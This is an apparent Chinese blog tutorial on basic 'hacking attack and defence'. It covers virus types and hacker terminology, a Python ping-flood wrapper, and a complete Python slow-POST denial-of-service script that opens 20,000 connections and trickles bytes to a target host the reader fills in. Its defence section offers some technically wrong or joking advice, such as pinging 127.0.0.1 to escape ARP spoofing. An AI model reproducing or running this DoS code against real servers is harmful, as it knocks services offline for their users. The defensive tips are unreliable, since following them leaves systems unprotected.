• 信息安全攻防基础


    序言

    先明确本篇文章旨在让有意学习者了解计算机病毒入侵的手段和防护办法,请各位学习者自觉遵循中华人民共和国相关法律法规。 其次,如果认为“黑客是坏蛋",建议先看看黑客骇客谁是坏蛋?

    其实关于入侵技术的文章一直都是比较少,可能是因为现在国家企业对网络安全越来越重视了,越来越多的技术人员从事网络安全防护,病毒入侵也不似以前那么猖狂。

    计算机病毒介绍

    概念

    狭义上的计算机病毒是指能够进行自我传播,需要用户敢于来触发执行的破坏性程序或代码。

    计算机病毒分类

    • 按照计算机病毒攻击的系统分类:
      (1)攻击Windows系统的病毒
      (2)攻击DOS系统的病毒
      (3)攻击UNIX系统的病毒
      (4)攻击Operating System/2系统的病毒

    • 按照计算机病毒的链结方式分类
      (1)源码型病毒
      (2)嵌入型病毒
      (3)外壳型病毒
      (4)操作系统型病毒

    • 按照计算机病毒的破坏情况分类
      (1)良性计算机病毒
      (2)恶性计算机病毒
      (3)引导型计算机病毒

    • 按照计算机病毒的传播媒介分类
      (1)单机病毒
      (2)网络病毒

    黑客术语

    蠕虫:一段能进行自我传播,无须用户干预而可以自动触发执行额破坏性程序或代码。

    木马:是指附着在应用程序上或单独存在的一些恶意程序,他可以利用网络远程响应网络的另一端的控制程序的控制命令,实现对被植入木马的目标计算机的控制或者窃取感染木马程序 的计算机上的机密资料。

    后门:允许攻击者绕过系统中常规安全控制机制的程序,它按照攻击者自己的意图提供通道。

    僵尸(bot):是指实现恶意控制功能的程序代码。大量被植入僵尸程序的电脑通过僵尸控制服务器便可以形成僵尸网络。

    rootkit:室友很多有用的小程序组成的工具包,使得攻击者能够保持访问计算机上具有最高权限的用户“root”。 换言之 ,rootkit是可以持久的,无法被检测地存在于计算机的一组程序或代码。

    间谍软件:以主动收集用户个人信息,相关机密文件或隐私数据为主,收集到的数据会主动传送到指定服务器 。

    流氓软件:具有一定的实用价值但具备电脑病毒和黑客软件的部分特征的软件

    exploit:精心设计的用于利用特定漏洞以及对目标系统进行控制的程序

    提权:操作系统低权限的账户将自己提升为管理员权限使用的方法。

    后门:黑客为了对主机进行长期的控制,在机器上种植的一段程序或留下的一个“入口”。

    跳板:使用肉鸡IP来实施攻击的其他目标,以便更好的隐蔽自己的身份信息。

    旁站入侵:即同服务器下的网站入侵,入侵之后可以通过提权跨目录手段拿到目标网站的权限。(常见的工具有:WebRobot、御剑、明小子和web在线查询等) 。

    更多黑客术语查看

    搭建环境

    • 首先,安装Python
      相信这一步大家都轻车熟路的啦,在这里略过……
      (PS:以下演示环境为Python3.7)
      安装Python3.7

    • 安装虚拟机并安装Windows系统镜像
      攻击别人的电脑或网站犯法,所以自己搭建个虚拟机吧(说机不说吧,文明你我他)òᆺó
      安装VMware
      安装VitrualBox
      以上安装虚拟机方式任选其一,安装完成记得下载iso文件安装系统

    ping网络堵塞

    首先,需要获取攻击的ip地址(这个是最基本的,连没有ip地址都不知道,就啥也搞不了)。
    Windows系统获得本机的ip地址只需要打开命令提示符(cmd)并输入ipconfig就可以了。但是攻击的时候需要目标的ip地址,这个时候就需要抓包工具啦。
    常用的几款抓包工具 ,找一个你觉得顺眼的工具用一下吧!(这里说一下,黑客的软件,不能随便下载,指不准在软件里做了手脚打包发出来的,所以尽量还是去可靠的渠道下载黑客工具吧,例如官网~)
    如果是获取网站ip地址,直接打开cmd,ping一下域名就行了。
    ping baidu.com

    如图,得到的 就是ip地址
    在这里来个补充,ping一下ip,原理上是本机给对方ip地址发送请求,如果对方ip收到请求那么就给本机返回数据包~在这过程中对方ip地址对应的服务器(电脑)

    试想,如果一直发送会不会造成网络堵塞?
    因此有了以下操作:

    PING -t ip
    注:这样可以PING指定的IP到永远,除非你停止它。很多初级黑客喜欢用这个参数来进行网络堵塞的攻击。
    PING -l 大小 ip
    注:这样可以设置发送包大小
    PING -n 次数 ip
    注:这样可以设置次数。

    PING -n 10 -l 10 baidu.com

    利用ping造成网络堵塞的Python3.7代码

        import os
        import socket
        import time
        ip = input("请输入IP:")
        os.system("ping -t -l 50 " + ip)
    
    

    分布式拒绝服务攻击(DDos)

    分布式拒绝服务攻击可以使很多的计算机在同一时间遭受到攻击,是一种网络攻击手法,其目的在于使目标电脑的网络或系统资源耗尽,使服务暂时中断或停止,导致其正常用户无法访问。

    来看看Python3.7的DDos代码

        import socket
        import time
        import threading
        #Pressure Test,ddos tool
    
        #---------------------------
        MAX_CONN=20000
        PORT=80
        HOST=""#在双引号里输入对方IP或域名,要保证他联网了或开机了.
        PAGE="/index.php"
        #---------------------------
    
        buf=("POST %s HTTP/1.1
    "
        "Host: %s
    "
        "Content-Length: 10000000
    "
        "Cookie: dklkt_dos_test
    "
        "
    " % (PAGE,HOST))
    
        socks=[]
    
        def conn_thread():
            global socks
            for i in range(0,MAX_CONN):
                s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
                try:
                    s.connect((HOST,PORT))
                    s.send(buf.encode())
                    print ("Send buf OK!,conn=%d
    "%i)
                    socks.append(s)
                except Exception as ex:
                    print ("Could not connect to server or send error:%s"%ex)
                    time.sleep(0.1)
        #end def
    
        def send_thread():
            global socks
            while True:
                for s in socks:
                    try:
                        s.send("f".encode())
                        #print "send OK!"
                    except Exception as ex:
                        print ("Send Exception:%s
    "%ex)
                        socks.remove(s)
                        s.close()
                time.sleep(0.1)
        #end def
    
        conn_th=threading.Thread(target=conn_thread,args=())
        send_th=threading.Thread(target=send_thread,args=())
    
        conn_th.start()
        send_th.start()
    
    

    防护

    预防

    最简单最基础的网络攻击讲完了,那么接下来该学学学习如何保护自己的计算机啦(*σ´∀`)σ

    • 如果是Win10,打开自带的Defender
      傻瓜式设置,按照系统的提示把防火墙什么的都打开

    • 无特殊情况不装360安全卫士,并且卸载360的所有软件

    • 尽量不要安装破解软件

    • 看到明显的恶意捆绑软件不要安装,以及defender提示病毒的软件也尽量不要安装。

    • 不进不明不网站,不收奇怪邮件。下载完压缩包文件后先进行病毒扫描

    • 关闭不必要的端口

    如何应对攻击

    接下来,我们来看看如何应对攻击

    应对DDoS攻击
    其实目前对上DDoS攻击都是个很烦事情。
    要想完全不受DDos攻击的危害——断网。
    打开cmd窗口,输入net stop Service,关闭Windows网络服务。
    关闭后,即可免遭危害。(滑稽)

    应对DNS欺骗
    重启网络路由,将浏览器全部还原为原设置。

    应对ARP欺骗
    重启网络路由,将浏览器(需要网络的软件)全部还原为默认设置。接着打开cmd窗口,输入arp -a,如果显示:没有ARP缓存表,说明你还在遭遇此攻击,否则你就已脱离了危险。接着,输入ping -t -l 10 127.0.0.1 ,不停地PING轮回IP,使其防止网络堵塞,还可能会摆脱危险。接着,打开资源监视器,找到网络,看看是谁在不断给你发送ARP数据包。找到后,立即找专业人员进行询问和修理,并且将此IP提交给专业人员。

    参考资料

    [1] Python3.7黑帽编程——病毒篇(基础篇):tiantian520_tt
    [2] 计算机病毒类型:发烧友学院
    [3]各类计算机病毒介绍:薛定谔的小橙子
    [4] Fiddler抓包工具总结:代码改变世界
    [5]常用的几款抓包工具:白清羽
    [6] 黑客的基础知识:残念( ̄▽ ̄)/王司徒
    [7]计算机网络安全——保护自己的计算机(基础)

  • 相关阅读:
    使用Kuboard界面在k8s上部署SpringCloud项目
    改造项目使用的Dockerfile文件
    在Kuboard上安装 Ingress Controller
    解决nexus仓库只能拉取不能推送的问题
    Logstash:运用 memcache 过滤器进行大规模的数据丰富
    Docker Compose配置文件详解(V3)
    Dockerfile 和 docker-compose.yml的区别
    实战---在Portainer中编排docker-compose.yml文件
    ctk-获取MANIFEST.MF中的数据
    继承时的析构函数
  • 原文地址:https://www.cnblogs.com/MemoryDrive/p/13303405.html
Copyright © 2020-2023  润新知